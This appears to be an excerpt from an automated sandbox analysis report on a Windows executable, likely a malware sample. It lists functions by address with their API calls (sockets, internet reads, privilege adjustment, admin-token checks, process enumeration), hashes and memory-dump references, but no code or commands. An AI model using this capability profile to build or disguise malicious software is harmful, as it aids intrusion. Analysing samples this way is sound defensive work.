                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: _memmove$Exception@8Throwstd::exception::exception
                              • String ID:
                              • API String ID: 1300846289-0
                              • Opcode ID: ebcf5237cb717ada82704038c6a72c21e3d5495d03dd6b2061f75ad411356420
                              • Instruction ID: 5184199f539f31c4f2265cc596a3bcc12804596a7620a512589f1cabe14a97e5
                              • Opcode Fuzzy Hash: ebcf5237cb717ada82704038c6a72c21e3d5495d03dd6b2061f75ad411356420
                              • Instruction Fuzzy Hash: 1D026F70A00209EBDF15EF68D985AAE7BB5FF44300F14816AE806EB355EB31DA51CF91
                              Function 00881287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                              • DefDlgProcW.USER32(?,?,?,?,?), ref: 008819FA
                              • GetSysColor.USER32(0000000F), ref: 00881A4E
                              • SetBkColor.GDI32(?,00000000), ref: 00881A61
                                • Part of subcall function 00881290: DefDlgProcW.USER32(?,00000020,?), ref: 008812D8
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ColorProc$LongWindow
                              • String ID:
                              • API String ID: 3744519093-0
                              • Opcode ID: 9329f22e5dcb2db6af62b27c0fe303bd64f404bde7bc50dd3f97d5e93431b0fc
                              • Instruction ID: 567748f7d4e11a7d2fc75ba7b60fe36b4f552089b85af8b2fa6373268a6e6aec
                              • Opcode Fuzzy Hash: 9329f22e5dcb2db6af62b27c0fe303bd64f404bde7bc50dd3f97d5e93431b0fc
                              • Instruction Fuzzy Hash: C6A116B1116568BEDE3CBB28CC5DEBB399CFB82759B14021AF402D62D2DE549D039372
                              Function 008F6A5A Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 008F80A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 008F80CB
                              • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 008F6AB1
                              • WSAGetLastError.WSOCK32(00000000), ref: 008F6ADA
                              • bind.WSOCK32(00000000,?,00000010), ref: 008F6B13
                              • WSAGetLastError.WSOCK32(00000000), ref: 008F6B20
                              • closesocket.WSOCK32(00000000,00000000), ref: 008F6B34
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ErrorLast$bindclosesocketinet_addrsocket
                              • String ID:
                              • API String ID: 99427753-0
                              • Opcode ID: 91812a7dc531383d6bad1de2dc7fc7b2676e38f90ac0d3c8d40efa01db8d12f6
                              • Instruction ID: f0fe22ede7d23ad6a7c39010756491a8fef9f0fabe8e83aaddd3bb4528cefa54
                              • Opcode Fuzzy Hash: 91812a7dc531383d6bad1de2dc7fc7b2676e38f90ac0d3c8d40efa01db8d12f6
                              • Instruction Fuzzy Hash: 0741A275600214AFEB10BF68DC86F7E77A9FB44720F448158FA5AEB3D2DA709D018792
                              Function 009055FD Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Window$EnabledForegroundIconicVisibleZoomed
                              • String ID:
                              • API String ID: 292994002-0
                              • Opcode ID: 8493f23afef624424a713ca8e4ee36dfb3c02a76856367c7018c599e51c73760
                              • Instruction ID: f0f083a82193cec9d8fa22e8d2a4e609d0dac43c137d98f2fd579798047a5cfd
                              • Opcode Fuzzy Hash: 8493f23afef624424a713ca8e4ee36dfb3c02a76856367c7018c599e51c73760
                              • Instruction Fuzzy Hash: EF11C4323009256FE7216F26DC54A2F7B9CFF84721B464429F846D7281CB319E01CEA5
                              Function 008FC304 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                              Download Yara Rule
                              APIs
                              • LoadLibraryA.KERNEL32(kernel32.dll,?,008C1D88,?), ref: 008FC312
                              • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 008FC324
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: AddressLibraryLoadProc
                              • String ID: GetSystemWow64DirectoryW$kernel32.dll
                              • API String ID: 2574300362-1816364905
                              • Opcode ID: beac9d172dacee143597c13f5d7f6ee47cc4ba542eb51ca0a4e744cfb3c05aa4
                              • Instruction ID: 604852f38ee592954309cdb01875c62051f94de7a376020da725001eecddba10
                              • Opcode Fuzzy Hash: beac9d172dacee143597c13f5d7f6ee47cc4ba542eb51ca0a4e744cfb3c05aa4
                              • Instruction Fuzzy Hash: 41E08C7421430BCFCB344B75C814A9676D8FB48388F808439EA85C2750E770D940CAB0
                              Function 00893190 Relevance: 6.6, APIs: 4, Instructions: 587COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: __itow__swprintf
                              • String ID:
                              • API String ID: 674341424-0
                              • Opcode ID: 27c3a95bb41e9deaf382e97160707507861204ec5a4956e83517d789360af30c
                              • Instruction ID: 0f64f7cce2e68cd74034a9c6162d10fdafa6899310514f84197411b6a2a13578
                              • Opcode Fuzzy Hash: 27c3a95bb41e9deaf382e97160707507861204ec5a4956e83517d789360af30c
                              • Instruction Fuzzy Hash: 362268716083019FDB24EF68C881B6AB7E4FF88704F18491DF59AD7291DB71EA04CB92
                              Function 008FF121 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                              Download Yara Rule
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32 ref: 008FF151
                              • Process32FirstW.KERNEL32(00000000,?), ref: 008FF15F
                                • Part of subcall function 00887F41: _memmove.LIBCMT ref: 00887F82
                              • Process32NextW.KERNEL32(00000000,?), ref: 008FF21F
                              • CloseHandle.KERNEL32(00000000,?,?,?), ref: 008FF22E
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                              • String ID:
                              • API String ID: 2576544623-0
                              • Opcode ID: 99239b2f968f42b51fbf747932aadfa12ea93d5818a776461b4eec6e03db68c4
                              • Instruction ID: eeb23ea4bb59cb64b4c3d1844afae1e77c74e00bd917dc20586f8228e50e3678
                              • Opcode Fuzzy Hash: 99239b2f968f42b51fbf747932aadfa12ea93d5818a776461b4eec6e03db68c4
                              • Instruction Fuzzy Hash: A7515B715083109FD310EF24D885A6BB7E8FF94710F14482DF595D6252EB70AA08CB92
                              Function 008E40B1 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON
                              Download Yara Rule
                              APIs
                              • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 008E40D1
                              • _memset.LIBCMT ref: 008E40F2
                              • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 008E4144
                              • CloseHandle.KERNEL32(00000000), ref: 008E414D
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: CloseControlCreateDeviceFileHandle_memset
                              • String ID:
                              • API String ID: 1157408455-0
                              • Opcode ID: 4cb568ede2837ed9a5297393f7fd52d50143e8af35230485a965dee9cec3585d
                              • Instruction ID: 7d9303ee35fdef8691bfec05cc0e813129b833a8360a7d0037b2ea4aa36b2357
                              • Opcode Fuzzy Hash: 4cb568ede2837ed9a5297393f7fd52d50143e8af35230485a965dee9cec3585d
                              • Instruction Fuzzy Hash: A911A7759012287AE7309BA5AC4DFABBB7CEF45760F1041AAF908E7180D6744F808BA4
                              Function 008DEB07 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlenW.KERNEL32(?,?,?,00000000), ref: 008DEB19
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: lstrlen
                              • String ID: ($|
                              • API String ID: 1659193697-1631851259
                              • Opcode ID: 58c51242e1d86708146073ac6b385934d291036879ff0183796358f90f458dab
                              • Instruction ID: 46a1e3cd3c24c9d014092d7acd8b55ca50340f64fbf261781298f415aa3f28c4
                              • Opcode Fuzzy Hash: 58c51242e1d86708146073ac6b385934d291036879ff0183796358f90f458dab
                              • Instruction Fuzzy Hash: DC323675A007059FD728DF19C481A6AB7F1FF48320B15C56EE89ADB7A2EB70E941CB40
                              Function 008F25E2 Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                              Download Yara Rule
                              APIs
                              • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 008F26D5
                              • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 008F270C
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Internet$AvailableDataFileQueryRead
                              • String ID:
                              • API String ID: 599397726-0
                              • Opcode ID: b12a9c4d50549445c241f8110ac5733bdb9e62c0f93557afcd276233a33ca400
                              • Instruction ID: 1ebc059d6d36ae82cf4847e273beb382488f67c75115a7fa242db520b05c3283
                              • Opcode Fuzzy Hash: b12a9c4d50549445c241f8110ac5733bdb9e62c0f93557afcd276233a33ca400
                              • Instruction Fuzzy Hash: 6C41D67150420DBFEB20EEA4DC85EBBB7BCFB50728F10406AF701E6540EA759E419765
                              Function 008EB59E Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                              Download Yara Rule
                              APIs
                              • SetErrorMode.KERNEL32(00000001), ref: 008EB5AE
                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 008EB608
                              • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 008EB655
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ErrorMode$DiskFreeSpace
                              • String ID:
                              • API String ID: 1682464887-0
                              • Opcode ID: 6ac2135a325950ffb9ad0ff9a6bd73a342df7956a07644147dad9fe03821726c
                              • Instruction ID: ba4849fac02fc80a57baa4ab40d80927cde59a60f092e90a0abdc685a78c85e1
                              • Opcode Fuzzy Hash: 6ac2135a325950ffb9ad0ff9a6bd73a342df7956a07644147dad9fe03821726c
                              • Instruction Fuzzy Hash: 88216235A10518EFCB00EF99D880EADBBB8FF49310F1480A9E945EB351DB319915CB51
                              Function 008D8CC3 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 008A0FF6: std::exception::exception.LIBCMT ref: 008A102C
                                • Part of subcall function 008A0FF6: __CxxThrowException@8.LIBCMT ref: 008A1041
                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 008D8D0D
                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 008D8D3A
                              • GetLastError.KERNEL32 ref: 008D8D47
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                              • String ID:
                              • API String ID: 1922334811-0
                              • Opcode ID: 408a3513d7e102b34dae0e27a7e4081a8bf384fdc2a44eacda0393155d2f47a3
                              • Instruction ID: 4dea8d3bc023855cf9233ee4e7f638eeb88d9161ff8f89d8681e5a67011aee1d
                              • Opcode Fuzzy Hash: 408a3513d7e102b34dae0e27a7e4081a8bf384fdc2a44eacda0393155d2f47a3
                              • Instruction Fuzzy Hash: 7F116AB1414209AFE728AF68DC85D6BB7BDFB44710B20862EF456D3681EF70B9408A60
                              Function 008E4C03 Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                              Download Yara Rule
                              APIs
                              • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 008E4C2C
                              • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 008E4C43
                              • FreeSid.ADVAPI32(?), ref: 008E4C53
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: AllocateCheckFreeInitializeMembershipToken
                              • String ID:
                              • API String ID: 3429775523-0
                              • Opcode ID: d982a7c5f710d9e629aa4990ea8f950002fbadc95e4ced80489891e6ea7625ae
                              • Instruction ID: 655602456e46edac43fae564d061945e5cb132b1a8263de23b9e76bd955d4cf3
                              • Opcode Fuzzy Hash: d982a7c5f710d9e629aa4990ea8f950002fbadc95e4ced80489891e6ea7625ae
                              • Instruction Fuzzy Hash: 98F04975A1130CBFDF04DFF0DC99AAEBBBCEF08701F1044A9A901E2581E6746B049B50
                              Function 0088E060 Relevance: 3.5, APIs: 2, Instructions: 539COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c332554d1082582fdd17439a9c6c422ea6b11d5b94def0a19757f9981f946195
                              • Instruction ID: 90fa86edfb64120adfe70a14aba70167cf823af34b6afa6ce5708078adb9a76f
                              • Opcode Fuzzy Hash: c332554d1082582fdd17439a9c6c422ea6b11d5b94def0a19757f9981f946195
                              • Instruction Fuzzy Hash: C922AD74A0021ADFDB24EF58C484AAEB7F0FF09314F148469E856EB351E774AD81CB91
                              Function 008EC93C Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                              Download Yara Rule
                              APIs
                              • FindFirstFileW.KERNEL32(?,?), ref: 008EC966
                              • FindClose.KERNEL32(00000000), ref: 008EC996
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Find$CloseFileFirst
                              • String ID:
                              • API String ID: 2295610775-0
                              • Opcode ID: 1547b2f9340917107d4bd9e5a8b3b34101afc7cc32b0940641dbd27417b5ed43
                              • Instruction ID: eba21e8c39207c31a94af71368b2e093c1316a3a561ed9a0c0564d606ce86f34
                              • Opcode Fuzzy Hash: 1547b2f9340917107d4bd9e5a8b3b34101afc7cc32b0940641dbd27417b5ed43
                              • Instruction Fuzzy Hash: E21161726146149FD710EF29D845A2AFBE9FF85324F04851EF9AAD7291DB30AD01CB81
                              Function 008EA2D5 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                              Download Yara Rule
                              APIs
                              • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,008F977D,?,0090FB84,?), ref: 008EA302
                              • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,008F977D,?,0090FB84,?), ref: 008EA314
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ErrorFormatLastMessage
                              • String ID:
                              • API String ID: 3479602957-0
                              • Opcode ID: 9eedebc25ad8a20a7a6018c5588ca44ce4bc17f195dd6440422146e508447ff1
                              • Instruction ID: 58dad320df8c992829107783b7b1fae109452f4aa695f4e3557c68832f7abefb
                              • Opcode Fuzzy Hash: 9eedebc25ad8a20a7a6018c5588ca44ce4bc17f195dd6440422146e508447ff1
                              • Instruction Fuzzy Hash: A9F0893555521DABDB209FA4CC88FEA776DFF09761F004155B918D6241D630A940CBA1
                              Function 008D8713 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                              Download Yara Rule
                              APIs
                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,008D8851), ref: 008D8728
                              • CloseHandle.KERNEL32(?,?,008D8851), ref: 008D873A
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: AdjustCloseHandlePrivilegesToken
                              • String ID:
                              • API String ID: 81990902-0
                              • Opcode ID: d26d002edc7ed7c241d3294c2e7909968b9e5dbc7f6dab8df7108a1530ffc28f
                              • Instruction ID: 57e5a85d86065507219fe6d0608132bf973328a944147874bce2b3c10ef337e8
                              • Opcode Fuzzy Hash: d26d002edc7ed7c241d3294c2e7909968b9e5dbc7f6dab8df7108a1530ffc28f
                              • Instruction Fuzzy Hash: F1E0BF75014610EEEB352B64EC09D7777A9FB04790B158529F466C0870DB615C90EB10
                              Function 008AA395 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,008A8F97,?,?,?,00000001), ref: 008AA39A
                              • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 008AA3A3
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ExceptionFilterUnhandled
                              • String ID:
                              • API String ID: 3192549508-0
                              • Opcode ID: 51a495a159cab6803cbc68138de310a13b24e57c01020751a212f572f9660495
                              • Instruction ID: 9d347e03e5b74be8134238d89a5eea68c94aab785514f3cc65498f40629212e8
                              • Opcode Fuzzy Hash: 51a495a159cab6803cbc68138de310a13b24e57c01020751a212f572f9660495
                              • Instruction Fuzzy Hash: 10B0923106C208AFCA102B91EC19B883FA8EB45BF2F404020F60D84860CB625650AA91
                              Function 008AF419 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
